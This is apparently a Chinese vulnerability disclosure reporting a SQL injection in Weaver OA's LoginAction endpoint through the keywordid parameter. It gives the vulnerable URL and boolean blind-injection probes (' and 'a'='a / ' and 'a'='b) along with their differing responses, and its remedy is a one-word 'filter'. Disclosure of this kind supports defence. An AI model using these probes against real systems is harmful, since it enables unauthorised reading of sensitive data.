###0x01漏洞简介
泛微OA系统在/ServiceAction/com.eweaver.base.security.servlet.LoginAction处对参数keywordid过滤不严格,导致出现SQL注入漏洞。远程攻击者可以利用该漏洞读取敏感信息。
###0x02漏洞详情
```
http://**.**.**.**:9085/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385
```
正常页面 提示请输入用户名
![](https://images.seebug.org/contribute/c57c09a0-690b-4552-bba0-151e90b3a1a2)
输入' and 'a'='a 提示请输入用户名
![](https://images.seebug.org/contribute/7c6aee50-d3d4-4840-a5df-1ce8660b919a)
输入' and 'a'='b 提示undefined
![](https://images.seebug.org/contribute/e481d133-529b-4d43-a2f2-367bed820d15)
###0x03漏洞修复
过滤。
Unavailable Comments